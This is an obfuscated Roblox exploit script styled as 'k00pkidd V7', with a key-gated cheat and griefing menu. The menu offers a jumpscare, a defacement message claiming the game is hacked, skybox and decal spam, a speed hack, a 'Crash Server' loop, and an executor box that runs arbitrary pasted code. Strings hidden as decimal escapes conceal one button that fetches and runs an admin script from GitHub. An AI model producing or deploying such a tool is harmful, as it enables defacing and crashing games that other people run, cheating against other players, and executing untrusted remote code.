local l1 = game:GetService("\67\111\114\101\71\117\105")
local l2 = game:GetService("\84\119\101\101\110\83\101\114\118\105\99\101")
local l3 = game:GetService("\80\108\97\121\101\114\115").LocalPlayer
local sg = Instance.new("\83\99\114\101\101\110\71\117\105", l1)
sg.Name = "\107\48\48\112\107\105\100\100\95\86\55\95\70\73\78\65\76"

local function k_sys()
    local f = Instance.new("\70\114\97\109\101", sg)
    f.Size = UDim2.new(0, 320, 0, 180)
    f.Position = UDim2.new(0.5, -160, 0.5, -90)
    f.BackgroundColor3 = Color3.fromRGB(15, 0, 0)
    f.BorderSizePixel = 2
    f.BorderColor3 = Color3.fromRGB(255, 0, 0)
    Instance.new("\85\73\67\111\114\110\101\114", f)
    
    local i = Instance.new("\84\101\120\116\66\111\120", f)
    i.Size = UDim2.new(0, 240, 0, 35)
    i.Position = UDim2.new(0.5, -120, 0.45, 0)
    i.PlaceholderText = "\107\48\48\112\107\105\100\100\32\75\69\89"
    i.BackgroundColor3 = Color3.fromRGB(30, 0, 0)
    i.TextColor3 = Color3.fromRGB(255, 255, 255)
    
    local b = Instance.new("\84\101\120\116\66\117\116\116\111\110", f)
    b.Size = UDim2.new(0, 120, 0, 35)
    b.Position = UDim2.new(0.5, -60, 0.68, 0)
    b.Text = "\76\79\71\73\78"
    b.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
    b.TextColor3 = Color3.fromRGB(255, 255, 255)

    b.MouseButton1Click:Connect(function()
        if i.Text == "\107\48\48\112\107\105\100\100" then f:Destroy() m_ui() end
    end)
end

function m_ui()
    local m = Instance.new("\70\114\97\109\101", sg)
    m.Size = UDim2.new(0, 550, 0, 350)
    m.Position = UDim2.new(0.5, -275, 0.5, -175)
    m.BackgroundColor3 = Color3.fromRGB(5, 5, 5)
    m.Active = true m.Draggable = true
    Instance.new("\85\73\67\111\114\110\101\114", m)

    local s = Instance.new("\83\99\114\101\108\108\105\110\103\70\114\97\109\101", m)
    s.Size = UDim2.new(0, 130, 1, -10)
    s.Position = UDim2.new(0, 5, 0, 5)
    s.BackgroundTransparency = 1
    s.CanvasSize = UDim2.new(0, 0, 2, 0)
    s.ScrollBarThickness = 0
    Instance.new("\85\73\76\105\115\116\76\97\121\111\117\116", s).Padding = UDim.new(0, 5)

    local function t(n)
        local b = Instance.new("\84\101\120\116\66\117\116\116\111\110", s)
        b.Size = UDim2.new(1, -10, 0, 30)
        b.Text = n
        b.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
        b.TextColor3 = Color3.fromRGB(255, 0, 0)
        b.Font = Enum.Font.Code
        local c = Instance.new("\83\99\114\111\108\108\105\110\103\70\114\97\109\101", m)
        c.Size = UDim2.new(0, 400, 0, 330)
        c.Position = UDim2.new(0, 140, 0, 10)
        c.Visible = false c.BackgroundTransparency = 1
        c.CanvasSize = UDim2.new(0, 0, 10, 0)
        c.ScrollBarThickness = 2
        Instance.new("\85\73\76\105\115\116\76\97\121\111\117\116", c).Padding = UDim.new(0, 5)
        b.MouseButton1Click:Connect(function()
            for _, v in pairs(m:GetChildren()) do if v:IsA("\83\99\114\111\108\108\105\110\103\70\114\97\109\101") and v ~= s then v.Visible = false end end
            c.Visible = true
        end)
        return c
    end

    local h = t("\72\79\77\69")
    local ma = t("\77\65\73\78")
    local tr = t("\84\82\79\76\76")
    local vi = t("\86\73\83\85\65\76")
    local pl = t("\80\76\65\89\69\82")
    local se = t("\83\69\82\86\69\82")
    local ex = t("\69\88\69\67\85\84\79\82")

    local function ab(p, n, c)
        local b = Instance.new("\84\101\120\116\66\117\116\116\111\110", p)
        b.Size = UDim2.new(1, -10, 0, 35)
        b.Text = "  > " .. n
        b.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
        b.TextColor3 = Color3.fromRGB(255, 255, 255)
        b.TextXAlignment = Enum.TextXAlignment.Left
        b.Font = Enum.Font.Code
        b.MouseButton1Click:Connect(c)
    end

    ab(tr, "\74\117\109\112\115\99\97\114\101\32\71\85\73", function()
        local jf = Instance.new("\73\109\97\103\101\76\97\98\101\108", sg)
        jf.Size = UDim2.new(1, 0, 1, 0)
        jf.Image = "rbxassetid://9422866248"
        jf.ZIndex = 999
        local js = Instance.new("\83\111\117\110\100", workspace)
        js.SoundId = "rbxassetid://556752357"
        js.Volume = 10 js:Play()
        task.wait(2.5) jf:Destroy()
    end)

    ab(h, "\73\110\102\105\110\105\116\121\32\89\105\101\108\100", function() loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\69\100\103\101\73\89\47\105\110\102\105\110\105\116\101\121\105\101\108\100\47\109\97\115\116\101\114\47\115\111\114\99\101"))() end)
    ab(vi, "\82\101\97\108\32\72\105\110\116", function() local hi=Instance.new("\72\105\110\116",workspace) hi.Text="\107\48\48\112\107\105\100\100\32\104\97\99\107\101\100\32\116\104\101\32\103\97\109\101\33\33" end)
    ab(vi, "\82\101\97\108\32\83\107\121\98\111\120", function() local s=Instance.new("\83\107\121",game.Lighting) local id="rbxassetid://9422866248" s.SkyboxBk=id s.SkyboxDn=id s.SkyboxFt=id s.SkyboxLf=id s.SkyboxRt=id s.SkyboxUp=id end)
    ab(vi, "\82\101\97\108\32\68\101\99\97\108\32\83\112\97\109", function() for _,v in pairs(workspace:GetDescendants()) do if v:IsA("\66\97\115\101\80\97\114\116") then for i=0,5 do local d=Instance.new("\68\101\99\97\108",v) d.Face=i d.Texture="rbxassetid://9422866248" end end end end)
    ab(pl, "\83\112\101\101\100\32\49\48\48", function() l3.Character.Humanoid.WalkSpeed = 100 end)
    ab(se, "\67\114\97\115\104\32\83\101\114\118\101\114", function() while true do print("\107\48\48\112\107\105\100\100") end end)

    local eb = Instance.new("\84\101\120\116\66\111\120", ex)
    eb.Size = UDim2.new(1, -10, 0, 180)
    eb.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
    eb.TextColor3 = Color3.fromRGB(0, 255, 0)
    eb.MultiLine = true eb.TextWrapped = true
    ab(ex, "\69\88\69\67\85\84\69", function() loadstring(eb.Text)() end)

    local tg = Instance.new("\84\101\120\116\66\117\116\116\111\110", m)
    tg.Size = UDim2.new(0, 30, 0, 30)
    tg.Position = UDim2.new(1, -35, 0, 5)
    tg.Text = "\45"
    tg.TextColor3 = Color3.fromRGB(255, 0, 0)
    local min = false
    tg.MouseButton1Click:Connect(function()
        min = not min
        if min then
            tg.Text = "\43"
            l2:Create(m, TweenInfo.new(0.3), {Size = UDim2.new(0, 40, 0, 40)}):Play()
            s.Visible = false
            for _, v in pairs(m:GetChildren()) do if v:IsA("\83\99\114\111\108\108\105\110\103\70\114\97\109\101") then v.Visible = false end end
        else
            tg.Text = "\45"
            l2:Create(m, TweenInfo.new(0.3), {Size = UDim2.new(0, 550, 0, 350)}):Play()
            task.wait(0.3) s.Visible = true h.Visible = true
        end
    end)
    h.Visible = true
end

k_sys()
